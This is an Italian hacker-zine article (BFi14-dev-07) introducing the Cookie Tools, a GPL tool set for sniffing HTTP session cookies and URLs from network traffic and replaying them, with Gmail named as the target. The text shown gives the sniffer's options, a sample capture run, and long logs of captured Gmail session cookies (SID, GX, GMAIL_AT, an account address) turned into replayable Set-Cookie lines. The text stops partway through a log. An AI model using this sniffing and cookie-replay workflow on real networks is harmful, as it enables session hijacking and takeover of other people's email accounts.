BFi14-dev-07 - i C00KiE T00LS

xenion - Michele Dallachiesa

michele dot dallachiesa at poste dot it

Contents

• Introduzione
• cookiesniffer
  • Utilizzo
  • Come funziona
  • Gli analyzers
  • Dipendenze, compilazione ed esecuzione
  
  
• cookieserver
  • Utilizzo
  • Come funziona
  • Dipendenze ed esecuzione
  
  
• Attacchiamo Gmail
• Conclusioni
• Links

Abstract:

Questa e' la versione HTML (non ufficiale) dell'articolo BFi14-dev-07. Per qualsiasi cosa, vedi §6. La versione dei Cookie Tools considerata e' la 0.3.

Introduzione

Negli ultimi anni e' andato aumentando l'interesse nelle applicazioni web. Google ne sta facendo il suo punto chiave con i suoi tantissimi servizi, seguita a ruota da tutti gli altri. Dietro ce' l'advertising personalizzato, un business che vale tanti tanti e tanti soldi. Molti servizi "gratuiti" sono soprattutto un sistema per raccogliere informazioni su ciascuno di noi. Piu' le informazioni sono private, piu' ci caratterizzano meglio. Quindi la nostra corrispondenza di email ed i nostri documenti personali sono anche la nostra rappresentazione piu' significativa. Google lo sa ed e' anche per questo che esistono servizi come Google mail e Google docs. Tutte queste applicazioni sono accessibili via web. La sicurezza? eh qui ci sono dei problemi. Di default questi servizi non sono per niente sicuri, tutto e' trasportato da HTTP in chiaro. Sicuramente questa e' una scelta, non una dimenticanza. Faro' piu' riferimenti a Google perche' io sono un (felice) utente di Google e quindi mi interessa maggiormente, quanto segue comunque vale anche per i servizi di Microsoft, Yahoo e tanti altri. In questo articolo presento i Cookie Tools, un insieme di applicazioni con le quali si possono fare varie cose: Sniffare e registrare le informazioni relative alle sessioni HTTP presenti negli header HTTP (cookies, URL, ...), analizzare le informazioni raccolte e attuare il (cookie|URL) replay attack in pochi secondi. A quanto ne so, questo e' il piu' avanzato progetto con queste funzionalita' (rilasciato sotto licenza GPL versione 2). Per finire, con i Cookie Tools analizzeremo i cookies di Gmail e li useremo per attuare il cookie replay attack.

cookiesniffer

cookiesniffer e' un semplice e potente cookie sniffer che riconosce (attraverso euristiche) e ricostruisce (con libnids) qualsiasi connessione HTTP nuova oppure gia' esistente, facendo il parsing di qualsiasi messaggio HTTP valido oppure parzialmente valido. L'output e' un insieme di file contenenti le informazioni raccolte con time-stamps in un formato che puo' essere facilmente utilizzato con i tool standard di UNIX come grep, awk, cut e sed. Supporta le reti wireless (AP_DLT_IEEE802_11).

Utilizzo

L'unico parametro obbligatorio e' la sorgente dei pacchetti (interfaccia di rete oppure file pcap). Questa e' la lista dei parametri accettati, dovrebbe essere abbastanza auto-esplicativa:

xenion@gollum:~/dev/cookietools$ ./bin/cookiesniffer                
Copyright (c) 2007 Dallachiesa Michele <micheleDOTdallachiesaATposteDOTit>
cookiesniffer of the Cookie Tools v0.3. The Cookie Tools are free software,
covered by the GNU General Public License version 2.

USAGE: cookiesniffer (-r|-i) <source> [options]

 INPUT

  -r <str>      Read packets from file (pcap format) <str>
  -i <str>      Read packets from network interface <str>
  -L <int>      Force datalink header length == <int>

 OUTPUT

  -d <str>      Set output directory to <str> (def: '.')
  -s            Save packets to 'x/pkts.y.pcap'
  -f            Disable stdout logging
  -F            Enable syslog logging
  -v            Be verbose

 SELECT

  -m            Sniff in promiscuous mode
  -p <str>      Add pcap filter <str>

 EXECUTION

  -Z <str>      Run as user <str>
  -D            Run in background (option -f implicit)

 MISC

  -0            Disable single packet handling (may cause information loss)
  -h            This

xenion@gollum:~/dev/cookietools$

Questo e' un esempio di esecuzione (prendi i pacchetti dall'interfaccia di rete eth0 utilizzando 'logz' come directory di output, mentre sto visitando dal browser mail.google.com e bbc.com):

xenion@gollum:~/dev/cookietools$ mkdir logz
xenion@gollum:~/dev/cookietools$ sudo ./bin/cookiesniffer -i eth0 -d logz
 + cookiesniffer of The Cookie Tools v0.3 running here!
 + pid: 15867, date/time: 21/11/2007#11:31:39
 + Configuration
   + INPUT
     Packet source: iface 'eth0'
     Force datalink header length: disabled
   + OUTPUT
     Output directory: 'logz'
     Logfile: 'logz/0.txt'
     Save pcap: disabled
     stdout logging: enabled
     Syslog logging: disabled
     Be verbose: disabled
   + SELECT
     Sniff in promiscuous mode: disabled
     Add pcap filter: disabled
   + EXECUTION
     Running as user/group: root/root
     Running daemonized: disabled
     Single packet handling: enabled
 * You can dump stats sending me a SIGUSR2 signal
 * Reading packets...
 ! handling single HTTP pkt: 192.168.1.2:47260 > 72.14.221.19:80
 ! handling single HTTP pkt: 72.14.221.19:80 > 192.168.1.2:47260
 ! handling single HTTP pkt: 192.168.1.2:47255 > 72.14.221.19:80
 ! handling single HTTP pkt: 72.14.221.19:80 > 192.168.1.2:47255
 ! handling single HTTP pkt: 192.168.1.2:47260 > 72.14.221.19:80
 ! handling single HTTP pkt: 72.14.221.19:80 > 192.168.1.2:47260
 ! handling single HTTP pkt: 192.168.1.2:47255 > 72.14.221.19:80
 ! handling single HTTP pkt: 72.14.221.19:80 > 192.168.1.2:47255
 ! handling single HTTP pkt: 192.168.1.2:47260 > 72.14.221.19:80
 ! handling single HTTP pkt: 72.14.221.19:80 > 192.168.1.2:47260
 ! observing HTTP conn: 192.168.1.2:44048 > 212.58.224.125:80
 ! observing HTTP conn: 192.168.1.2:57767 > 212.58.253.72:80
 ! observing HTTP conn: 192.168.1.2:40400 > 62.189.244.254:80
 ! observing HTTP conn: 192.168.1.2:43955 > 209.62.178.57:80
 ! observing HTTP conn: 192.168.1.2:43956 > 209.62.178.57:80
 ! observing HTTP conn: 192.168.1.2:43957 > 209.62.178.57:80
 ! observing HTTP conn: 192.168.1.2:43958 > 209.62.178.57:80
 ! observing HTTP conn: 192.168.1.2:55713 > 209.62.176.52:80

Puoi anche ricevere alcune statistiche mandando al processo il segnale SIGUSR2. Questa e' la directory di output risultante:

xenion@gollum:~/dev/cookietools$ ls logz
192.168.1.2-209.62.176.52.session   192.168.1.2-212.58.253.72.txt
192.168.1.2-209.62.176.52.txt       192.168.1.2-62.189.244.254.session
192.168.1.2-209.62.178.57.session   192.168.1.2-62.189.244.254.txt
192.168.1.2-209.62.178.57.txt       192.168.1.2-72.14.221.19.session
192.168.1.2-212.58.224.125.session  192.168.1.2-72.14.221.19.txt
192.168.1.2-212.58.224.125.txt      log.0.txt
192.168.1.2-212.58.253.72.session
xenion@gollum:~/dev/cookietools$

Questa e' l'esecuzione 0 (la prima esecuzione) ed il file log.0.txt contiene il log dell'esecuzione. Ciascuna connessione tracciata ha 2 file: Il file clientip-serverip.txt contiene informazioni che puoi facilmente leggere, il file clientip-serverip.session contiene informazioni che cookieserver puo' facilmente utilizzare. Nota che nel session file gli HTTP header "Cookie" sono magicamente trasformati in "Set-Cookie" utilizzando come path "/", come expires "Tuesday, 2-Feb-2020 02:02:02 GMT" e come domain il top domain estratto dall'HTTP header "Host" oppure dalla URL richiesta. Questo massimizza la potenza di cookieserver. Il session file contiene anche le URL richieste (possono contenere informazioni rilevanti sulla sessione). Questi sono i logs delle connessioni da 192.168.1.2 (client) a 66.249.91.19 (server):

xenion@gollum:~/dev/cookietools$ cat logz/192.168.1.2-72.14.221.19.txt
pktcount=4 time=21/11/2007#11:31:41.239263 src=192.168.1.2:47260 dst=72.14.221.19:80
s POST /mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=9&SID=B7BBE82A5077EC37&RID=89041&zx=it9k92y1rgwv&t=1 HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Content-Type: application/x-www-form-urlencoded
h Referer: http://mail.google.com/mail/
h Content-Length: 35
c0 type=Cookie
c0 name='__utma' value='173272373.1523618165.1195636735.1195636735.1195636735.1'
c0 name='__utmc' value='173272373'
c0 name='__utmz' value='173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral'
c0 name='GX' value='DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v'
c0 name='S' value='gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y'
c0 name='GMAIL_AT' value='xn3j37i0ev7wcknl8mwn6svd7dl85s'
c0 name='gmailchat' value='charlieroot69@gmail.com/138671'
c0 name='TZ' value='-60'
c0 name='GMAIL_RTT' value='121'
c0 name='GMAIL_LOGIN' value='T1195636734978/1195636734978/1195636738633'

pktcount=13 time=21/11/2007#11:31:41.555086 src=192.168.1.2:47260 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h ETag: 
h Content-Encoding: gzip
h Content-Length: 26
h Server: GFE/1.3
h Date: Wed, 21 Nov 2007 10:31:42 GMT

pktcount=17 time=21/11/2007#11:31:42.446297 src=192.168.1.2:47255 dst=72.14.221.19:80
s GET /mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=inbox HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Referer: http://mail.google.com/mail/
c0 type=Cookie
c0 name='__utma' value='173272373.1523618165.1195636735.1195636735.1195636735.1'
c0 name='__utmc' value='173272373'
c0 name='__utmz' value='173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral'
c0 name='GX' value='DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v'
c0 name='S' value='gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y'
c0 name='GMAIL_AT' value='xn3j37i0ev7wcknl8mwn6svd7dl85s'
c0 name='gmailchat' value='charlieroot69@gmail.com/138671'
c0 name='TZ' value='-60'
c0 name='GMAIL_RTT' value='121'
c0 name='GMAIL_LOGIN' value='T1195636734978/1195636734978/1195636738633'
c0 name='SID' value='DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF'

pktcount=21 time=21/11/2007#11:31:42.699130 src=192.168.1.2:47255 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache, no-store
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h Content-Encoding: gzip
h Content-Length: 919
h Server: GFE/1.3
h Date: Wed, 21 Nov 2007 10:31:43 GMT

pktcount=23 time=21/11/2007#11:31:42.972861 src=192.168.1.2:47260 dst=72.14.221.19:80
s GET /mail/?ui=2&ik=a70d6eca1f&view=ad&ak=s6cmkdkein1jmp2a91ddp8yun54n24w HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Referer: http://mail.google.com/mail/
c0 type=Cookie
c0 name='__utma' value='173272373.1523618165.1195636735.1195636735.1195636735.1'
c0 name='__utmc' value='173272373'
c0 name='__utmz' value='173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral'
c0 name='GX' value='DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v'
c0 name='S' value='gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y'
c0 name='GMAIL_AT' value='xn3j37i0ev7wcknl8mwn6svd7dl85s'
c0 name='gmailchat' value='charlieroot69@gmail.com/138671'
c0 name='TZ' value='-60'
c0 name='GMAIL_RTT' value='121'
c0 name='GMAIL_LOGIN' value='T1195636734978/1195636734978/1195636738633'
c0 name='SID' value='DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF'

pktcount=27 time=21/11/2007#11:31:43.196161 src=192.168.1.2:47260 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache, no-store
h Pragma: no-cache
h Content-Type: text/javascript; charset=UTF-8
h Content-Encoding: gzip
h Content-Length: 764
h Server: GFE/1.3
h Date: Wed, 21 Nov 2007 10:31:43 GMT

pktcount=29 time=21/11/2007#11:31:46.113463 src=192.168.1.2:47255 dst=72.14.221.19:80
s POST /mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=1552&SID=B7BBE82A5077EC37&RID=89042&zx=d7qazjopodh6&t=1 HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Content-Type: application/x-www-form-urlencoded
h Referer: http://mail.google.com/mail/
h Content-Length: 35
c0 type=Cookie
c0 name='__utma' value='173272373.1523618165.1195636735.1195636735.1195636735.1'
c0 name='__utmc' value='173272373'
c0 name='__utmz' value='173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral'
c0 name='GMAIL_STAT_PENDING' value='/S:a=lc&sv=tl&ev=tl&s=25&t=1637&w=623&'
c0 name='GX' value='DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v'
c0 name='S' value='gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y'
c0 name='GMAIL_AT' value='xn3j37i0ev7wcknl8mwn6svd7dl85s'
c0 name='gmailchat' value='charlieroot69@gmail.com/138671'
c0 name='TZ' value='-60'
c0 name='GMAIL_RTT' value='121'
c0 name='GMAIL_LOGIN' value='T1195636734978/1195636734978/1195636738633'

pktcount=35 time=21/11/2007#11:31:46.626738 src=192.168.1.2:47255 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h ETag: 
h Content-Encoding: gzip
h Content-Length: 26
h Server: GFE/1.3
h Date: Wed, 21 Nov 2007 10:31:47 GMT

pktcount=38 time=21/11/2007#11:31:50.984025 src=192.168.1.2:47260 dst=72.14.221.19:80
s GET /mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=6425&SID=B7BBE82A5077EC37&RID=89043&TYPE=terminate&zx=eh281lp7e4it HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Referer: http://mail.google.com/mail/
c0 type=Cookie
c0 name='__utma' value='173272373.1523618165.1195636735.1195636735.1195636735.1'
c0 name='__utmc' value='173272373'
c0 name='__utmz' value='173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral'
c0 name='GMAIL_STAT_PENDING' value='/S:a=lc&sv=tl&ev=tl&s=25&t=1637&w=623&'
c0 name='GX' value='DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v'
c0 name='S' value='gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y'
c0 name='GMAIL_AT' value='xn3j37i0ev7wcknl8mwn6svd7dl85s'
c0 name='gmailchat' value='charlieroot69@gmail.com/138671'
c0 name='TZ' value='-60'
c0 name='GMAIL_RTT' value='121'
c0 name='GMAIL_LOGIN' value='T1195636734978/1195636734978/1195636738633'
c0 name='SID' value='DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF'

pktcount=44 time=21/11/2007#11:31:51.203587 src=192.168.1.2:47260 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h ETag: 
h Content-Length: 0
h Server: GFE/1.3
h Date: Wed, 21 Nov 2007 10:31:51 GMT

xenion@gollum:~/dev/cookietools$ cat logz/192.168.1.2-72.14.221.19.session 
1195641101.239263 Link: http://mail.google.com/mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=9&SID=B7BBE82A5077EC37&RID=89041&zx=it9k92y1rgwv&t=1
1195641101.239263 Set-Cookie: __utma=173272373.1523618165.1195636735.1195636735.1195636735.1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: __utmz=173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: GX=DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: S=gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: GMAIL_AT=xn3j37i0ev7wcknl8mwn6svd7dl85s; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: gmailchat=charlieroot69@gmail.com/138671; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: GMAIL_RTT=121; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: GMAIL_LOGIN=T1195636734978/1195636734978/1195636738633; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Link: http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=inbox
1195641102.446297 Set-Cookie: __utma=173272373.1523618165.1195636735.1195636735.1195636735.1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: __utmz=173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: GX=DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: S=gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: GMAIL_AT=xn3j37i0ev7wcknl8mwn6svd7dl85s; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: gmailchat=charlieroot69@gmail.com/138671; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: GMAIL_RTT=121; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: GMAIL_LOGIN=T1195636734978/1195636734978/1195636738633; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: SID=DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Link: http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=s6cmkdkein1jmp2a91ddp8yun54n24w
1195641102.972861 Set-Cookie: __utma=173272373.1523618165.1195636735.1195636735.1195636735.1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: __utmz=173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: GX=DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: S=gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: GMAIL_AT=xn3j37i0ev7wcknl8mwn6svd7dl85s; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: gmailchat=charlieroot69@gmail.com/138671; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: GMAIL_RTT=121; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: GMAIL_LOGIN=T1195636734978/1195636734978/1195636738633; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: SID=DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Link: http://mail.google.com/mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=1552&SID=B7BBE82A5077EC37&RID=89042&zx=d7qazjopodh6&t=1
1195641106.113463 Set-Cookie: __utma=173272373.1523618165.1195636735.1195636735.1195636735.1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: __utmz=173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=25&t=1637&w=623&; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: GX=DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: S=gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: GMAIL_AT=xn3j37i0ev7wcknl8mwn6svd7dl85s; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: gmailchat=charlieroot69@gmail.com/138671; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
